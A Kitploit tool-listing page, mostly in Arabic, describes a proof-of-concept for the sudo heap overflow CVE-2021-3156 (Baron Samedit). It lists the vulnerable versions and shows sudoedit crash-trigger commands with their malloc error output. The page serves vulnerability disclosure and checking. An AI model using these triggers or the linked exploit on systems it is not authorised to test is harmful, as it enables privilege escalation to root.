Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156 — استغلال إثبات المفهوم لـ CVE-2021-3156، وهو تجاوز سعة مخزن مؤقت مستند إلى الكومة في sudo يسمح بتصعيد الامتيازات المحلية إلى الجذر عبر sudoedit -s مع وسيطة سطر أوامر مصممة. | Kitploit
أدوات/GitHubGitHub/shuhaib88/baron-samedit-heap-buffer-overflow-cve-2021-3156
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمراستغلال الملفات الثنائية
GitHubshuhaib88/baron-samedit-heap-buffer-overflow-cve-2021-3156

Baron-Samedit-Heap-Buffer-Overflow-CVE-2021-3156

استغلال إثبات المفهوم لـ CVE-2021-3156، وهو تجاوز سعة مخزن مؤقت مستند إلى الكومة في sudo يسمح بتصعيد الامتيازات المحلية إلى الجذر عبر sudoedit -s مع وسيطة سطر أوامر مصممة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

بارون-ساميديت-تجاوز-سعة-المخزن-المؤقت-في-الكومة-CVE-2021-3156


الإصدارات المعرضة للثغرة

تؤثر ثغرة بارون ساميديت (CVE-2021-3156) على الإصدارات القديمة من sudo من 1.8.2 إلى 1.8.31p2 والإصدارات المستقرة من 1.9.0 إلى 1.9.5p1. تم إدخال هذا الخلل في تجاوز سعة المخزن المؤقت في الكومة في يوليو 2011 عبر الالتزام 8255ed69 وبقي غير مكتشف لما يقرب من عقد.

يحتوي Sudo قبل الإصدار 1.9.5p2 على خطأ إزاحة بمقدار واحد (off-by-one) يمكن أن يؤدي إلى تجاوز سعة المخزن المؤقت في الكومة، مما يسمح بتصعيد الصلاحيات إلى الجذر عبر "sudoedit -s" ووسيطة سطر أوامر تنتهي بحرف شرطة مائلة عكسية واحدة.

التحقق من الثغرة باستخدام أمر python

root@kitploit:~
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
root@kitploit:~
malloc(): invalid size (unsorted)
Aborted

التحقق من الثغرة باستخدام أمر python

root@kitploit:~
sudoedit -s '\' `perl -e 'print "A" x 65536'`
root@kitploit:~
malloc(): corrupted top size
Aborted (core dumped)

الاستخدام والنتيجة في أوبونتو 20.04

root@kitploit:~
shuhaib@somebox:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

shuhaib@somebox:~$ sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): invalid size (unsorted)
Aborted (core dumped)

shuhaib@somebox:~$ sudoedit -s '\' `perl -e 'print "A" x 65536'`
malloc(): corrupted top size
Aborted (core dumped)
تنزيل الأداة